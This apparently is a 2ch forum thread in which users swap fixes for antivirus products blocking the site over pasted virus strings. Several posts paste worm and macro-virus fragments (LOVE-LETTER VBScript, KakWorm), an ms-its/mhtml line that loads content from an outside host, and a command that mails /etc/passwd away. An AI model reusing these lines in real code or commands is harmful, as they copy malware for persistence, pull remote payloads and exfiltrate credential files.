HTTP MSIE JavaScript OnLoad Rte CodeExec に
引っかかるのはどーしtらいいんだべ? だめIPじたいで弾かれる、ちなみにセキュリティ板。
信頼ゾーンの設定ないから、HTTP MSIE JavaScript OnLoad Rte CodeExec
じたいを除外してる。 >>657が最新?live22xでまだ誤作動するんだけど 俺もNAVで、今ワームブロックされてここに来た。
ログ除外も専ブラ除外もダメやね… >>692
俺も同じく・・・
NAVは関係ないのかと思ってた 同じコード貼られてんのに反応する時としない時がある・・・
ノートンさんは気まぐれなのか? いっそのことインターネットワーム防止機能自体無効にしちゃっても良いんじゃいない? どうやら最近のAutoUpdateで、NISだけでなくNAVもHTTP MSIE JavaScript OnLoad
Rte CodeExecにひっかかるようになったらしい。
NAVではIP除外の設定ができないので、ハマっている人が多いっぽい。
OpenJaneでは特定のキーワードをあぼ〜んすることで回避できるが、
ギコナビだと出来ないらしい。
間違ってるかもしれないが、参考までに。 私は
一時的にノーd先生の「インターネットワーム防止」を寝かせる
↓
ログを取得
↓
ノーd先生を起こす
↓
ゆっくりとログを読む
で対応してるけど・・・
この方法を編み出すまでに3時間ぐらいハマッた。 >>699
まあふつうの板ならそれで十分だね。
実況系に貼られるとアレだけど。 >>698にあるようにあぼーん設定するだけで、NAVいじらずに対処できた。
NAVで困ってる人にマジオススメ。 一応書いておいた方がいいかな。OpenJaneにて以下の手順で回避確認。
間違ってたらツッコミよろ。
○NAVを使っていて"このコンピュータに対する侵入 「HTTP MSIE JavaScript OnLoad
Rte CodeExec」 の試みを検出して遮断しました。"というメッセージが出て、
2chに30分間アクセスできなくなった時の対処方法(とりあえず)
1.NAVのオプション→インターネットワーム防止→「除外の設定」で、
「HTTP MSIE JavaScript OnLoad Rte CodeExec」のチェックをはずす
2.「AutoBlockルール」で、2chへの遮断を解除
3.スレを開いてログを取得する
4.専用ブラウザのあぼ〜ん設定で、NGWORDなどを使って、当該レスを表示しないようにする
5.手順1ではずした「除外の設定」のチェックを元に戻しておくのを忘れない >>701
ついでにウイルスコードもまとめてあぼ〜ん指定したら
NGワードファイルがノートン先生に吹っ飛ばされますた。
俺バカス(´・ω・`)
キタ━━ <body onload=window()> ━━━ !! >>710
読み込んでからNGワードかどうか判断するから意味ないと思われ。 >>711
だよねえ。
上の方に「あぼ〜んで対処できた」って書いてあったから試してみたけど、
通信の時点で遮断しちゃうんだからローカルあぼ〜んじゃ
どうにもならないよね。 Jane viewならNGワードでOKだよ。
もちろん初回はダメね。 一度ノートン切って取得してから、レス消去したらその後は問題なかったよ。
ホットゾヌ2です。 一度ノートンを通さずにスレ取得する部分が重要であって、あぼーんする必要は無いってことかな? このスレもウイルスがいるようだ。
ノートンが2度発動。しかも最新50で >>717
ですね。
実際あぼーんしてなくても、いったん取得すれば問題ないし。 誤作動に当たるのかわからんが、ノートン2005入れてて
今まで特に問題も無かったが最近エクセル開こうとしたら
「ウイルスチェックを開始します…」といって全く開けなくなった。
コレはどういうことなんですかね?解決策とかありますか? ここは2chのスレを見たらノートンが誤作動する人のスレです
2ch絡みでない誤作動の面倒を見るスレではありません
エクセルでの誤作動報告は当局に対して行ってください
つか運営系でノートンスレとあったら扱うのは2ch絡みのみ
それ以外は門前払いされるのは当然
アンチウイルス使ってるけど侵入検知とかって項目がない・・
しょうがなくAutoBlock見て解除してる >>725
そうなんだよ、それが見つからなくて困ってここに来たよ。 >>726
参考までに・・・ただし、自己責任で
ノートンアンチウイルス2006 Ver.1
http://pc8.2ch.net/test/read.cgi/sec/1129452372/996
> まず、オプション→インターネット→インターネットワーム防止→除外の設定で、
> HTTP MSIE JavaScript OnLoad Rte CodeExecのチェックを外す。
> そのあと、オプション→インターネット→インターネットワーム防止→
> AutoBlockルール→現在、AutoBlockで遮断しているコンピュータで、
> 遮断解除してok。で、ok。 >>727
おお、ありがとうございます。見れました。
うち2005なのに今日から突然誤作動が始まった・・・なんなんだ。 NAVの場合、こういう方法もあります。onload〜の場合のみ。
1.スレッドを見ると
「「HTTP MSIE Java Script OnLoad Ret CodeExec」の試みを検出して遮断しました。」
という反応をする。
2.Norton AntiVirusのオプションを開いて、インターネットワーム防止を選択、
AutoBlockルールのリストから先程のIPアドレスを消して、閉じる。
インターネットワーム防止をオンにするのチェックを外して無効にする。
3.スレッドを再取得
4.http://www.geocities.jp/cen_hp/program3.html を使って無効化
5.インターネットワーム防止をオンにするのチェックをして有効にする。 >>727
ν速だけ繋がらないから鯖落ちしてんのかと思った
おかげで助かりました
ありがとう 馬鹿コードをはれないように2ちゃんのほうでなんとかならないものかな?
うっとうしくってしかたない。 >>731
>>167
まあこの2人がこう発言しているから、やらないでしょう。 フィギュアなんか誰も見ないし、しかも荒川出てないんだし・・・ 適当な文字を貼り付けるウイルス?あるじゃん
それで無差別にコード貼りまくられたら流石に2ちゃんも対応するだろ。
分からない人の苦情が殺到して対応に追われるから。
>>167は危機感足りないんじゃ? 単なる文字列であって実行ファイルではないのに検知する仕様をどうにかするのと
2ch側の対応、どっちが早いかな。 コード貼り付けなんて何年前からあると思ってんの。
今更危機感足りないとか対応とか望んでも無駄でしょう。
無差別に爆撃ってことなら、コード貼り付け関係なくその爆撃自体は対応するでしょうけどね。 >>738
今までの対応の仕方をみていて、単なる野次馬の予想ですが。
>適当な文字を貼り付けるウイルス?あるじゃん
これは対応すると思うが(現に今もやっている)
>それで無差別にコード貼りまくられたら流石に2ちゃんも対応するだろ。
>分からない人の苦情が殺到して対応に追われるから
こっちは対応いないんじゃないかな?
現に苦情が殺到中のコメントが>>167だった訳だし。
ノートンを切るか、2chに来ないかと言う答えになると思うよ。 ウィルスじゃないものに反応するものとしないもの、選択権はユーザーにあるわけで
シェアをトレンドマイクロに奪われたりすればシマンテックも誤作動対策に着手するかもしれないが
ユーザーに対策を押し付けるような商売してたら淘汰されるのも仕方ないと思う 何でこのスレはいろいろはってあるのにスレが取得できるの? シマンテックの日本支社はおそらく事態を把握してるだろうけど、
エンジンを書き換えるとなると本社の対応が必要なわけで、
「ある一つの掲示板が見られなくなる」ということの重要性が
あっちに伝わらないんだろうと思われ。
1000万人のネットユーザから不買運動されたらさすがに考えると
思うけど、そういう組織だった動きにもなっていないし。
もっとも、Antinny亜種の対応に追われている状況では
2ちゃんに対してあまり好意的にはなれないことも考えられるが。 > もっとも、Antinny亜種の対応に追われている状況では
> 2ちゃんに対してあまり好意的にはなれないことも考えられるが。
ウィルスがあってこそのアンチウィルスソフトだから、
新種ウィルスの発現はむしろ喜ばしく思ってたりするんじゃないスかね この期に及んで2ちゃんでの誤作動に対応したら面白いな
仕様変更しない限り対応はしないんじゃねえかなぁ
それともユーザーが束になって苦情入れたら対応するのかな? スレ違いの部分にレスをつけてしまった予感
もしくは恋の予感
ごめん 2ch対応
これだけで日本での売り上げが伸びるのにな シマンテック本社に英文で熱烈なラブコールすればいいんじゃね? >>751
切に願う
ttp://dictionary.www.infoseek.co.jp/?sv=KO&qt=%C0%DA%A4%CB&sm=1&lp=0&se=on&gr=ml
>>752
言いだしっぺの(ry
ってラブレターなのかいw
http://pc7.2ch.net/test/read.cgi/pcqa/1109609938/365
無しの礫・・・
ソース入れたから撥ねられているんだろなぁ〜
Monazilla/1.00 (JaneView/0.1.12.1) 対応する気なんか無いでしょ。
2002のころから、正規ユーザーとしてバージョンアップごとに
シマンテックにはご注進してきたのに、ラブレター文字列すら対応しないんだもの。
今回も、ワーム防止に自分ルール追加しろ、って返事だったよ。
(2chのサーバIPアドレスを信頼するように設定して回避しろと) さぁー回ってきましたっ!
この文を3〜10ヵ所に貼り付け、回してくださいw
これをやった貴方は絶対に夢や学校一のモテ仔に
なりますw
やんなかったら不幸が突撃します
もうココまで読んでしまった人は最低3ヵ所は回さないと絶対不幸が100%突撃して死亡するでしょう
この画像は最低3ヵ所回してから見てください
こちら
3〜10ヵ所って事は3箇所以上だったらなんでもいんですよっ!
やればやるほどし・あ・わ・せ!
これやった人は実際に
両思いになれたり、
学校一のモテ仔になれたり、
夢が叶ったり
欲しい物が手に入ったり。
一気に幸せが手に入ります
だから移せば移すほどお得!
成功した人の名前↓
山田三春
中野 純
その他にもたっくさん叶った人が居ます
だから回してね失敗した人なんて居ません
http://mickey.mirv.net/2chnis.html
にある対処方法(2chサーバのIPアドレスを除外する)はNISだけなんで、
NAV2005でそれらしい箇所探した。
「オプション」→「インターネットワーム防止」→「一般ルール」→「Default Non-Routable IPs」を「修正」→「処理」タブで「許可」→「コンピュータ」タブの「下のリストにあるコンピュータとサイトのみ」で「追加」→「個別」
のとこにコピペでいいと思う。右クリックで貼り付けがきかなかったので、Ctrl+Vでやった。 もしかして対応された?
遮断されるスレ開いても(ログも削除した)何も起きないんだけど >>757
LiveUpdateしても、このスレを再所得すると反応するよ。
対応されていないのでは? さっき先生が誤作動起した。
2ちゃんから攻撃されたので遮断しますたって
なんとか解除したけど
ノートンのソフト自体の終了方法ってないの?
タスクマネージャ見てもどれがどれだかさっぱり・・・。 ノートンの機能自体の質問は板違いです
セキュリティ板のノートンスレとかシマンテックに聞け 当方AVGなんですが
http://tmp6.2ch.net/test/read.cgi/download/1142734610/
ここの2にAVGが反応するんですが
反応しないようにするにはどうしたらいいんですかね? そのスレをあぼーん。
ていうかうちもAVGだか、なんともないけどな? >>764-766
まぁセキュリティ板行けって話だけど、AVGは有償のPro版でないと除外指定ができない。 今日ノートンが反応してここに誘導してもらって最初から読んでたけど、
NIS入れてないし侵入検知って項目も無いのに…て思ってたらNAVでも反応するのか。
ここまで読むの大変だったけどためになったわ有り難う 当方マカフィーなのだが、下記のスレを取得しようとすると大激怒されて、
該当datが抹殺されたあげくネットアクセスが遮断されてしまう… orz
【領事館員自殺】中国側、機密を執拗に要求…総領事あての遺書入手(読売新聞)★2
ttp://news19.2ch.net/test/read.cgi/newsplus/1143894478/l50
…時々こういう事が起こるのだが、その都度運営板の
どこぞかの該当スレに通報した方がイイのかしらん?
>>771
マカフィーも反応するんだ。そこの9スレ目で。 >>771
とりあえず製品の不具合(ウィルスじゃないものに反応する)はマカフィーに通報でいい >771-772
マカフィーを窓から投げ捨てろ。
さもなきゃ自分の頭を窓から投げ捨てろ。 >>774
いやNIS2005だけどもうすぐ切れるからマカフィーにしようかなと。 アボーソすればいいじゃん。
漏れのノートン先生は無反応になったぜ。
専ブラ使っていれば、な。 NAVの場合の設定を教えてくれー
インターネットワーム防止で
ナニをシグネチャ除外すれば良いんだ? >>778
THX
HTTP MSIE JavaScript OnLoad Rte CodeExec
って 「MS IE」と別のとこにあるのな…ないよーと思って困ってました。 ms-its:mhtml:file://C:\
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<body onload=window()>
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
End Sub
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WC 2005でも誤作動するようになったな
専ブラのあぼーんよりも先にノートンがdatに反応するようになったのが原因ぽい >>75で2chは問題なくなったがしたらばがまだだめだ このスレ、更新しようとすると、NISにブロックされて、専ブラのタブが赤くなる。(JaneDoeStyle223)
あぼーんワードはどれですか?
今はNISを無効にしてカキコしています。
>>510
>>512
>>517
これらはすべてアボーソしてあります。
NISの設定も変えていませんでした。
>>780-785あたりでJaneDoeStyle223がおかしくなりました。
他スレでは何ともありません。
で、あれからは、ログを取得し直しただけですが、無問題になりました。
いったい何だったんだろう。
ログが壊れただけだったのかな…。
なんかバスターが2ちゃんのスレをIEで見るとそれだけでウイルス検知するようになったらしいね・・・
先生よりアグレッシブだな まあ、あれだ。
アップデートとアップロードを間違えるのはここだけにしておけ。 >>794
また誰かがウィルスコード貼ったのか…(泣
馬鹿フィーが大激怒 orz この板限定の機能
tasukeruyoするとuserAgent情報が表示される
でもスレ違い
Monazilla/1.00 (JaneStyle/2.23) すいません、私はノートンではなくシマンテックアンチウイルスを使ってるのですが、この場合はどのように対処すればいいんでしょうか
既出の問題でしたらすいません >>807
ありがとうございます
私はノートンアンチウイルスではなくてシマンテックアンチウイルスを使ってるのですが、同じようにできるのですか?
オプションが見つからないのですが・・・ >>808
ノートンアンチウイルスの場合
オプション→インターネットワーム防止→有効にするのチェックはずしてみ シマンテックアンチウイルスってはじめて聞いたや
ぐぐったところ企業用?
よくわからんが個人のPCにどこまで権限あるのかねぇ >>810
説明不足ですいません、企業用のものです
一応無償でもらったノートPCなのですが・・・
ノートンに変えていいか聞いてみます てst
Monazilla/1.00 (JaneStyle/2.23) test
Monazilla/1.00 (JaneNida/060425) また、マカフィーが大激怒…
任天堂新ハード正式名称発表その名も「wii(ウィー)」
ttp://live22x.2ch.net/test/read.cgi/news/1146155170/
…「ノートン先生」みたいに、スキャン対象から簡単に外せないんだから、ウィルスコード貼るな!
お願いしますよ orz 『Exploit-MhtRedir.gen』止めて… (鬱氏 tes
Monazilla/1.00 (JaneNida/060425) ためさせて・・
Monazilla/1.00 (V2C/T20060424) あんちういるす2006の一般ルールで追加許可してもだめだ(´・ω・)ワケワカンネ >>824
オプション→インターネットワーム防止→AutoBlockで遮断しているIPがあれば除外
→防止を有効にするのチェック外してログ取得
これでもダメ? >>825
今やってみた、ダメだった(´・ω・)ccgrgfvvbtぶぐtvgfxdbcrgvf また、コード貼った馬鹿が… orz
【国際】「麻薬の運び屋に仕立てられた」 無罪訴え続けた日本人男性、逮捕から14年で仮釈放…オーストラリア
ttp://news19.2ch.net/test/read.cgi/newsplus/1147357192/
シクシクシク 昨日あたりから板を開くとノートンが反応するんだけど、
同じ境遇の人っている? >>830
よくある誤作動かと思います。
とりあえずノートン切ってから、ログ取得してみてください。 ノートンを誤作動させる文字列は何年も前からあるし、シマンテックに連絡しても
これで正常と言って対策しない。
つまりシマンテックは自力で対策できる人だけ買ってくれればいいと言っている。
そんなソフトは>>167 AntiVirus の設定→除外→C:\Program Files\Jane\Logs
2chブラウザ使ってるならこれでいいでそ >>833
そりゃJaneの場合だろ。他の2chブラウザでも原理は同じだが。 Janeを開いたり更新をするたびに
C:\ProgramFiles\Jane Style\Logs\2ch\AA\AAサロン\subject.txt
この警告が出ます。
除外もしたり、このtxtを削除したりもするのですが効果が出ませんでした。
対処法をお願いします。 >>835
ノートン?
なら、ログ除外でこのスレ見てみ。 だからノートンは使う人を選ぶんだってば
アンインストールして乗り換え 3日前から、ラウンジクラシックに入ろうとするとノートンアンチウイルス2005が反応して、
sports2鯖ごとノートンにアク禁されます。
一度踏むと30分間アク禁で、ノートン無効にしてもダメなので困ってます。
↓ログ
詳細: このコンピュータに対する侵入 「HTTP MSIE JavaScript OnLoad Rte CodeExec」 の試みを検出して遮断しました。
侵入者: sports2.2ch.net(210.(伏せ;侵入者のIPアドレス))(http(80)).
危険度: 高
プロトコル: TCP
攻撃された IP: DEFAULT(192.(伏せ;自分のPCのIPアドレス).1).
攻撃された ポート: xxxx
↑ランダム
これもウイルスコードの仕業ですか。 >839
AntiVirusじゃなくPersonal Firewallを無効にしろ。
あとついでだが、192.168.*.*は隠す必要ないから。 ついでに2ちゃんのIPも隠す必要皆無
つうか、このスレを読めよ >>839
NISの方は
ttp://mickey.mirv.net/2chnis.html
NAVの方は>>727
をやってみれ N速+でまた、幾つかのスレにウィルスコード張られてるなぁ…
貼る馬鹿は、樹海池 貼る馬鹿っつーのは、他人の家に勝手に出前送りつけたり
ピンポンダッシュして物陰からニヤニヤしながら眺めてるような奴なのかな?
マジで樹海逝ってくれ てす
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1) 野豚先生のオートブロックからオカ板を救い出そうとしたんだけど、制限押しちゃった。
どうしたら制限解除できるか教えてえらい人。 c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l" 今日ノートンをつけたけど、ホントにウィルスが反応したwww
びっくりww ×ウィルスが反応した
○ウィルスじゃないものに誤反応した おおう・・・アンチウイルスがMSIEJAVAオンロードに反応して
このスレの対策覗けなかったぜ
ワーム防止解除でやっと見れた
少し賢くなれた気がする。自分にとって不具合がある方がなあに、かえって免疫力がつく。
そして流石はノートン先生、生まれた子供を崖から消毒するだけのことはある。 >そして流石はノートン先生、生まれた子供を崖から消毒するだけのことはある。
ここんとこクソワロタ。
専用ブラウザ使ってる人は、852の書き込みをそのままNGワードのリストに貼っちゃうというのも
楽かも知れないですね、とか言ってみるテスト。 このスレ開いたらキタ━━━━(゚∀゚)━━━━!!とか出た 今日反応したスレ
【日テレ隠蔽疑惑】炭谷宗佑アナを報じない日テレ、容疑否認のテレ東社員を実名報道 テレ東も即日実名で伝える★2
http://news19.2ch.net/test/read.cgi/newsplus/1148999462/
…この騒動が起きてから、幾つかの『日テレ隠蔽疑惑』関連スレに、
ウィルスコード貼ってる香具師が居るなぁ
まさか、関係者?>コード貼る馬鹿 祭りのスレに貼られるのはお約束となっております
いちいち反応しないでください どう?
Monazilla/1.00 (cockcrow/2.5.5.5) 誤作動ばかり起こるセキュリソフトを使い続ける人の気が知れねwwww やっとここにたどり着いた。
昨日206.223.152.55に攻撃されたのはノートンのせいってこと?
何度も攻撃されてびびったよ誰か教えて。 >昨日206.223.152.55に攻撃された
なんで2ちゃんのサーバーがお前を攻撃するんだ?
206.223.152.55 = tiger508.maido3.com = life7.2ch.net
自己紹介 夢・独り言 生活サロン 生活全般 その日暮らし 一人暮らし 借金生活
スポーツクラブ 記念日 冠婚葬祭 育児 家具 モデル ファッション 靴 化粧 美容 美容整形
一般海外生活 北米海外生活 クレジット 家庭 懸賞 たばこ めがね マイライン コンビニ バーゲン
ヒッキー メンヘルサロン 癒し 人生相談 心と宗教 身体・健康 アトピー アレルギー ハゲ・ズラ メンタルヘルス ノートンアンチウイルス2005の場合、設定はどうやったらいいのでしょうか?
エロイ人教えて 正直、>>756 をやってもダメなんですけど。当方NAV2005でつ >>870
駄目と言われても誰もわかりませんよ
とりあえず↓スレ参照
【ノートン入れたら2chに書きこめない】人へ18
http://etc3.2ch.net/test/read.cgi/qa/1112631967/ 書き込まず読み込むだけで
インターネットワーム防止→AutoBlockルール
にその板の2ちゃんアドレスが書き込まれます
もちろん「侵入を検知して遮断しました」と言われるわけですが
「HTTP MSIE JavaScript OnLoad Rte CodeExec」のチェックを外せば
読み込めますが、うざすぎ つーか、誤動作というより2ch管理人が
HTTP MSIE JavaScript OnLoad Rte CodeExec送信してアクセス妨害しているだけだし
ノートン入れられると2chにとって都合の悪い利用者のハッキングができないから
どーしてもノートンを外させたいらしいね 確かに、そうした穿った見方もできるよな。
みんな、気にしてるぜ。 >>835
表示されたファイルをAuto−Protectの除外リストに加える。
シマンテック
ttp://service1.symantec.com/SUPPORT/INTER/navjapanesekb.nsf/7c3ff4677729271685256c470046ed2e/d9265b84ded9587488256b0400811ff7 >>882
こんなの調べればすぐ分かることだし
一月も前のレスに、わざわざレスしなくても・・・ >>883
貴重なご意見ありがとうございます。
今後の参考にさせていただきます。 p + w * 10 <br> End Sub <br>
LOVE-LETTER-FOR-YOU
//<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???
これってNIS2003でどう対処すればいいですかね
ttp://mickey.mirv.net/2chnis.html とかもやってみたけど効果なかった。 ウィルスコードをカキコミできないようにはでけへんの? むしろウイルスコード貼ったヤツは強制フシアナになるようにすればいいんだよ。
どこの誰がやっているか一発でわかるしww いまさらウイルスコードでギャーギャー騒ぐ奴ってなんなの?
馬鹿なの? 今日ちょうどギャーギャー騒いでる奴見かけたところだw
642 名前:名無しさん@ゴーゴーゴーゴー! [sage] 投稿日:2006/06/11(日) 03:26:36 ID:aqYcE6Jh
だれだ最近、避難所にウイルスコード貼る奴。
専ブラがおかしくなって、そのたびに削除→ダウンロードしなおし→お気に入り登録しなおし、すごい手間、めちゃくちゃ迷惑。
643 名前:名無しさん@ゴーゴーゴーゴー! [sage] 投稿日:2006/06/11(日) 07:23:59 ID:QvemZE+C
>>642
それって難民フォルダーにあるsubject.txt(専ブラによって名称違うかも)を上書きするだけで直るよ ログ除外してるのに、進入検知だか遮断とか出て更新不能になる
張ってる奴もノー豚も氏ね Norton使わなきゃいいだけの話なのに
何でこんなに盛り上がってんの?
Symantecがクソなだけだろ。
2chがそこまで面倒見る必要ないよ。 _,..--‐‐‐‐‐-...,_
/:::::::::::::::::::::::::::::::::::'.,
/:::::::::::::::::::::::::::::::::::::::::::::::..
i, NOD32厨 ::::::::::::,
ゝ /' '\ :::::::::::'
. -・=-, 、-・=- ::::::::::;'
| .,ノ(・ ・ ( ⌒ ::6)
.l ┃トョヨコイ┃ .ソ < Norton使わなきゃいいだけの話なのに
ヽ┃`ニ'´ ┃ ,.i-、
,`~,'i' "~ / ,>"'-、 ここずっと芸スポにかたっぱしから貼りまくってる奴どうにかして… windowsを最新にして、ひとつのルールを除外するだけで解決するのにな・・・ それがどんなに素晴らしいソフトでも、厨が推奨するソフトは糞。 まぁ、私の場合は
NAVが反応→NAVのオプションから
インターネットワーム防止>AutoBlockルール>全ての遮断を解除
して、インターネットワーム防止を解除(警告が出るので、OKを押しておく)
→2chブラウザのログを取得して、ウィルスコードの部分をローカルあぼーん
で、難なくNAVを使っているわけだが。 >>907
言い忘れたが、インターネットワーム防止を復帰させるのを忘れずに。
#放っておいても、15分で自動復帰するが。 >>909
NAVが反応→2ch鯖が遮断
↓
NAVを起動して、オプションにアクセス。インターネットワーム防止をクリック
↓
AutoBlockルールをクリックして、全ての遮断を解除をクリック
↓
インターネットワーム防止をオンにするのチェックを外す>OKを押す
↓
保護の警告ダイヤログが出る。
停止時間を15分、1時間、5時間、システム再起動まで、永久的から選択可能。
OKを押すとインターネットワーム防止機能が停止。
↓
ログを取得して、ウィルスコードが書かれたレスを
2chブラウザのローカルあぼーん機能で削除する。
#ブラウザ上あぼーんでも、取得したdatには残るソフトでは駄目かも。
↓
インターネットワーム防止機能を復帰させる。 わからない五大理由改
<ノートントラップにかかる六大理由>
1. 読まない ・・・対処法は書いてあるのに読まない。読む気などさらさらない。
2. 調べない ・・・過去スレ、ググるなど最低限の内容も自分で調べようとしない。
3. 試さない ・・・めんどくさいなどの理由で実行しない。する気もない。
4. 理解力が足りない ・・・理解力以前の問題で理解しようとしない。
5. 人を利用することしか頭にない ・・・甘え根性でその場を乗り切ろうとする。
6. それでもノートンを使う ・・・上記に該当するのに、誤作動を仕様と言って直さない糞ソフトに大事なお金を垂れ流す。 >>910
2003にはないや。orz
dですた。 >912
>5. 人を利用することしか頭にない ・・・甘え根性でその場を乗り切ろうとする。
それを世間一般では、『 要領がいい 』又は『 狡い 』という。
912は、要領の悪い世間知らずのヒッキーか?
現在回避できないノートントラップなどあるでしょうか?
特にノートンじゃなくても良いのですが、他の不具合が出るとか、
ありますでしょうか。
私は早々にノートンから他のセキュリティー製品に切り替えてしまったので、その辺りが解らないので質問させていただきました。。 >>915
ノートンについては対策全部やってれば特にないよ。
他のは使ってないのでわかんない。 >>912
ノートンを誤作動とか言ってる時点でわかってないじゃない >>920
一応レス後半やまとめサイトの2005のをやった後に一時的によくなったんですが
ダメな板はダメで、その後>>13とかやったんですけどはじかれちゃうんですよ。
他にありませんかね。
30分待てば又スレ読めますので教えてください 専ブラ読み込むたびにノートンの警告でるの止めたいのですが >>917 さん
返信ありがとうございます、参考にさせていただきます。
>>916 さん
情報ありがとうございます
アバストについては自分で調べてみます。 928の後、調べたところ、
アバストも設定で回避できるということがわかりました、
ノートンも確認済み。
(微妙にすれ違い失礼しました。) NIS2005の場合(多分NIS2006も同じ)
タスクトレイのNISアイコンを左クリック>「Norton Internet Securityを開く」
NISが開いたら、左側の一覧から「Norton Internet Security」を選ぶ
システムの状態一覧から「ファイアーウォール」を選ぶ
左下にある「設定」ボタンを選ぶ
「ネットワーク」タブを選ぶ
「信頼」タブを選ぶ
「追加」を選ぶ
「個別」を選ぶ
アドレスに以下の数字の塊を一行でコピペする ← ここで、コピペができません。どうしたらいいですか?
どうせ右クリ効かないとかだろ
初心者板行けと言いたいところだがctrl+v >>937
できました。 ありがとうございました。 とあるスレ一覧更新したら「WScript.KakWorm」の警告がでます
どうやって誤検知除外したらいいのでしょうか?
つーか、例の構文貼られても遮断しなくなった。
ノートン側が折れて対応したって事なのか? ttp://info.2ch.net/wiki/pukiwiki.php?%CA%E4%C2%AD%A4%C8%CA%E4%B4%B0#Norton_Emergency_measures
のノートン緊急対策を見て、アドレスに大量のIPアドレスを貼って、これで大丈夫だと思ったら、
芸スポの中田のスレで、またウィルス貼られてるし。
でも前と違って、他のスレは全部すぐ読める。前は30分遮断されたけど。
これは別の種類のなんちゃってウィルスかな?もうどうしたらいいかわからん。
次々といろんなコード貼るから、疲れる・・・ さっきから同じファイルばっかり表示して感染してる感染してるってノートンが騒いで
ます。まじめにうざいので黙らせる方法を教えてください。 そういえば。この間延長キーを購入したんですが、支払って二週間たっても延長キー
とやらが添付されたメールが届かないんですよ。ウイルスバスターとかも
こんなもんなの? >>910
すみません。便乗質問になってしまいますが。
最近NAV2004からNIS2006に切り替えたので、>>910 の設定を見かけて
ついでにやっておこうと思ったのですが、
「インターネットワーム防止」と言う項目が見つかりません。
これはNAVパッケージにしかない項目なのでしょうか。
NISの場合は何処を設定すると良いのでしょうか。 >>951,952
ありがとうございます。
「インターネットワーム防止」だけで検索していたのでは見つかりませんね。
「NIS」検索で見つかりました。
>>842の方法で、つまりNISでは「インターネットワーム防止」を設定ではなくて、
http://mickey.mirv.net/2chnis.html のIP一覧を追加する、ですね。 NGワードに追加してもNGワードの.txtが削除される・・・ 専用ブラウザのフォルダ丸ごと監視対象から外す、これ最短。 >>1と同じ状態になってるんだけどどうすればいいの・・・ >>956
1.このスレを最初から読む
2.Nortonの使用をやめる
お好きな方をどうぞ ためしにNAVの設定元に戻してみたら
引っかからなくなってるような。(<body onload=w****w()>)
シマンテックが対策した?
NISはもってないからわからんけど。 vbsウイルスのソースじゃなくて侵入を検出して遮断しました、の
やつだよ。 もう頭悪いからノーdの設定ができない。
自分の常連のスレ片っ端から張られてギコだめだし、
IEで見るようになった。
もう更新やめて別のアンチウィルスソフトにするかな。
それまで我慢してだ。
でもシマンテックの客が減るよな〜。 >>965
ってか
このスレは侵入を検出して遮断しました用のスレだと思ってた。
vbsウイルスのソースに誤反応、のスレは他にあるし。。 あ、レス読み違えたスマソ
うちでは何故かnavの設定戻して一度も開いたことないスレのログ取ってみても再現しない。
nav2005です。vbsウイルス用のフォルダ除外の設定はそのまま。 >>968
だってNAVが誤反応してるわけじゃないもの。
侵入検知はファイアーウォールのお仕事でしょ。 >>969
>>687以降参照。
